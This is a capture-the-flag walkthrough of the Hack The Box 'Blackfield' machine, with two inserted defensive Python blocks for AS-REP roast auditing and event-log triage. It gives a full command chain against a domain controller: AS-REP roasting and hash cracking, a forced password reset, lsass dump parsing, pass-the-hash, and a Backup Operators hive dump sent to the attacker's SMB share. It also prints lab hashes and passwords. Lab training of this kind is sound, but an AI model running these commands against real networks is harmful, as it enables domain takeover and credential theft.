HTB Blackfield - full linux pwn with Exegol writeup

This writeup is based on Shutdown's method, presented at a Hack The Box France meetup.

Wlayzz
7 min read · Mar 21, 2022

This pwn is based on a full Linux approach: we will never run PowerShell or Windows commands.

To simplify our hacking journey, I highly recommend you use Exegol. If you don't know Exegol, it's a hacking environment like Kali Linux with a lot of powerful tools already installed.

The best features of Exegol, in my opinion, are:

  • Powerful history & autocompletion for command lines, with parameters already filled in for you; you just need to replace the values.
  • Segmented environments per pentest engagement
  • Some PRs merged in advance (Impacket)
  • The latest releases of tools (BloodHound v4)
  • And some more.

Are you excited about Exegol? Just follow the instructions on the GitHub repository. I highly recommend installing the full version (this can take a while and weighs about 25 GB). Now that you have installed Exegol, we are ready to go.

Run an Exegol container with the HTB VPN config

Reconnaissance

Let’s run a quick nmap recon.

nmap -sS -v -Pn -T5 10.10.10.192

Based on these ports, we can assume we are facing a domain controller.

Let’s continue with enum4linux.

enum4linux-ng -A 10.10.10.192

This is a lot of information. First, let's configure our /etc/resolv.conf with the information we got, for DNS resolution.

Secondly, enum4linux tells us that a guest session works on SMB (line 55). It also reports that a null session works (line 53), but that is a false positive (cf. STATUS_ACCESS_DENIED every time it tries to dump things over SMB).

Let's try a guest session on SMB using smbmap (you can use whatever you want as the guest session name).

smbmap -H 10.10.10.192 -u 'wlayzz'

Interesting, we have some uncommon shares: forensic & profiles$. We only have access to profiles$, so let's dive in with smbclient.

smbclient.py BLACKFIELD/wlayzz@10.10.10.192 -no-pass

It seems we have folders labeled with the users of the domain. I found nothing interesting in the folders, but with all these usernames we can try an ASREProast attack (learn more on thehacker.recipes).

ASREProast

To perform this technique, we need to create a file with all the usernames. Just copy-paste the console output and use a couple of bash commands.

rev command reverses strings
awk '{print $1}' command gets the first column

Now with our list of users, let’s do the attack.

GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users -dc-ip 10.10.10.192 BLACKFIELD.local/
ASREProast attack
Result of ASREProast

In the output file ASREProastables.txt, the script found an account, support, with a hashed password. This is possible because Kerberos pre-authentication is not required for this user.
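Two defender-side checks for the precondition described above, added here as an example and not part of the original writeup: an audit of userAccountControl values for the DONT_REQ_PREAUTH flag (the setting that makes an account roastable), and a parser for the hashcat-format lines GetNPUsers writes, so a finding can be matched back to the directory. The account names and hex values in the samples are constructed.

```python
# Added example (not from the original writeup): defender-side checks for the
# AS-REP roasting precondition, Kerberos pre-authentication not required.
import re

# Documented userAccountControl flag values (ADS_UF_* from Microsoft docs).
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_REQ_PREAUTH = 0x400000


def preauth_disabled(accounts):
    """accounts: {sAMAccountName: userAccountControl}. Return the enabled
    accounts that skip Kerberos pre-authentication (the roastable ones)."""
    return sorted(name for name, uac in accounts.items()
                  if uac & UAC_DONT_REQ_PREAUTH and not uac & UAC_ACCOUNTDISABLE)


def remediated_uac(uac):
    """Value to write back to userAccountControl to require pre-auth again."""
    return uac & ~UAC_DONT_REQ_PREAUTH


# hashcat mode 18200 line as GetNPUsers -format hashcat writes it:
# $krb5asrep$23$user@REALM:<checksum hex>$<encrypted timestamp hex>
ASREP_RE = re.compile(r"^\$krb5asrep\$23\$([^@]+)@([^:]+):[0-9a-f]+\$[0-9a-f]+$")


def roasted_accounts(lines):
    """Parse an ASREProastables.txt-style file into (user, realm) pairs, so the
    result can be reconciled with the directory audit without cracking."""
    found = []
    for line in lines:
        m = ASREP_RE.match(line.strip())
        if m:
            found.append((m.group(1), m.group(2)))
    return found


# Constructed sample: 512 = NORMAL_ACCOUNT, 0x10000 = DONT_EXPIRE_PASSWORD.
SAMPLE_UAC = {
    "support": 512 | UAC_DONT_REQ_PREAUTH,
    "audit2020": 512,
    "svc_backup": 512 | 0x10000,
    "old_svc": 512 | UAC_ACCOUNTDISABLE | UAC_DONT_REQ_PREAUTH,  # disabled
}
# Constructed hash line: the hex is made up, not a real capture.
SAMPLE_HASHES = ["$krb5asrep$23$support@BLACKFIELD.LOCAL:" + "ab" * 16 + "$" + "cd" * 24]

if __name__ == "__main__":
    print(preauth_disabled(SAMPLE_UAC), roasted_accounts(SAMPLE_HASHES))
```

A disabled account with the flag set is deliberately not reported, since the KDC will not issue an AS-REP for it.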

Let's move on to hashcat to try cracking this hash.

hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt /usr/share/wordlists/rockyou.txt
hashcat using rockyou wordlist
Password of support account cracked

Now, let's immediately check whether the cracked password for support is valid, using the LDAP module of CrackMapExec.

cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' --kdcHost 10.10.10.192

I think it's time to get an overview of the relations in Active Directory using BloodHound.

BloodHound

Before we start, we need to run the neo4j database.

Then run the BloodHound extraction script.

You should now have some JSON files in your working directory. Next we have to import them into the neo4j database.

Due to a bug in BloodHound v4 we need to import the files manually through the interface. Run bloodhound to get the interface, then click on Upload Data on the right (red box on the screenshot below).

First, we are going to mark the user support as owned. Search for the user in the top input.

Now let's see the next jump we can make with this user. Click the menu on the left of the search input, navigate to the Analysis tab, go to Custom Queries and, in the Tigers love pepper section, click on Next steps from owned users.

The first thing we see is that support has the ForceChangePassword right on the audit2020 account.

ForceChangePassword

As the support account has the ForceChangePassword right on the audit2020 account, we are going to change the password of this account.

net rpc password 'audit2020' '123Soleil!' -U 'BLACKFIELD'/'support'%'#00^BlackKnight' -S 'dc01.blackfield.local'

Now don't forget to mark the user as owned in BloodHound and check whether we can jump to another target.

No jump possible, so let's go back to the SMB shares and check audit2020's rights.

smbmap -H 10.10.10.192 -u 'audit2020' -p '123Soleil!'

We have read rights on forensic, so let's dive into this share.

smbclient.py 'BLACKFIELD'/'audit2020':'123Soleil!'@10.10.10.192

lsass.zip looks interesting; download it with get lsass.zip.

It seems someone dumped the lsass process (learn more on thehacker.recipes). On The Hacker Recipes we learn that a ProcDump has probably been done, and we also find a pypykatz command to use our lsass.DMP file.

pypykatz lsa minidump lsass.dmp

We retrieve 3 accounts with their NT hashes:
- svc_backup 9658d1d1dcd9250115e2205d9f48400d
- DC01$ b624dc83a27cc29da11d9bf25efea796
- Administrator 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

Pass the hash

We need to verify whether these accounts work, using the pass-the-hash technique.

cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'  --kdcHost 10.10.10.192

Only the svc_backup account can authenticate, and cme tells us this account may be admin.

Check the SMB share rights.

smbmap -H 10.10.10.192 -u 'svc_backup' -p '9658d1d1dcd9250115e2205d9f48400d:9658d1d1dcd9250115e2205d9f48400d'

We can read C$, so maybe our first flag is here. Get in with smbclient.

smbclient.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD'/'svc_backup'@10.10.10.192

Now let’s root this box ! 😈

Mark this account as owned in BloodHound and check the jumps.

Backup Operators

We can see svc_backup is a member of Backup Operators. Looking at The Hacker Recipes, this seems juicy.

Thanks to Shutdown's recent pull request, we can perform this attack from Linux using Impacket by dumping the registry hives directly from the domain controller, which leads to DCSync.

To perform this attack, you need to run an SMB server in a first terminal.

smbserver.py -smb2support WLAYZZ .

Then, in a second terminal, run the Impacket script with your IP and your SMB server name.

reg.py -hashes :9658d1d1dcd9250115e2205d9f48400d 'BLACKFIELD.local/svc_backup@10.10.10.192' backup -o '\\10.10.16.2\WLAYZZ'

Dumping the hives can take a moment; it's time to grab a coffee. ☕

Now that we have the backup hives, we can run secretsdump.
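From the blue-team side, both moves in this chain leave a trace in the domain controller's Security log: the password reset that ForceChangePassword permits shows up as event 4724 (An attempt was made to reset an account's password), and a Backup Operator's logon that carries SeBackupPrivilege, which is what lets reg.py save the hives, shows up as event 4672 (Special privileges assigned to new logon). The triage below is an added example, not part of the original writeup; the allowlists and the event records are constructed assumptions, not real logs.

```python
# Added detection example (not from the original writeup). Triage a stream of
# Windows Security events for the two steps above: an account-password reset
# (event 4724) and a logon granted SeBackupPrivilege (event 4672).
# Event records are simplified dicts built from the documented event fields;
# they are constructed samples, not captured logs.

# Assumed allowlists for this environment: who may reset other users'
# passwords, and which accounts are expected to log on with backup rights.
HELPDESK = {"helpdesk1"}
BACKUP_ALLOWED = {"Administrator", "DC01$"}


def triage(events):
    """Return alerts as (kind, subject, detail) tuples.

    password-reset: a 4724 where the subject resets someone else's password
                    and is not a known helpdesk account (ForceChangePassword).
    backup-privilege: a 4672 whose privilege list includes SeBackupPrivilege
                    for an account outside the expected backup operators."""
    alerts = []
    for ev in events:
        if ev["id"] == 4724 and ev["subject"] != ev["target"] \
                and ev["subject"] not in HELPDESK:
            alerts.append(("password-reset", ev["subject"], ev["target"]))
        elif ev["id"] == 4672 and "SeBackupPrivilege" in ev["privileges"] \
                and ev["subject"] not in BACKUP_ALLOWED:
            alerts.append(("backup-privilege", ev["subject"], ev["host"]))
    return alerts


# Constructed sample events (names taken from the box, values made up).
SAMPLE_EVENTS = [
    {"id": 4724, "subject": "helpdesk1", "target": "jdoe", "host": "DC01"},
    {"id": 4724, "subject": "support", "target": "audit2020", "host": "DC01"},
    {"id": 4672, "subject": "Administrator", "host": "DC01",
     "privileges": ["SeBackupPrivilege", "SeRestorePrivilege"]},
    {"id": 4672, "subject": "svc_backup", "host": "DC01",
     "privileges": ["SeBackupPrivilege", "SeRestorePrivilege"]},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

On a domain controller the 4672 check is noisy for genuine administrators, which is why the example keys on an allowlist rather than on the privilege alone.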

For an unknown reason, pass the hash doesn't work with the Administrator account, but we got its password in clear.

cme ldap 10.10.10.192 -d BLACKFIELD.local -u 'Administrator' -p '###_ADM1N_3920_###'  --kdcHost 10.10.10.192

Last move to get the root flag? Let's see.

smbclient.py 'BLACKFIELD'/'Administrator':'###_ADM1N_3920_###'@10.10.10.192

We did it. 🎉 🥳
I hope you liked this box as much as I did.

I want to thank Shutdown for his work on The Hacker Recipes, Exegol and Impacket. 💪

Also thanks to Euz and the Hack the box France community. 🤟

Find me on Twitter: Wlayzz. Good hacking 🏴‍☠️
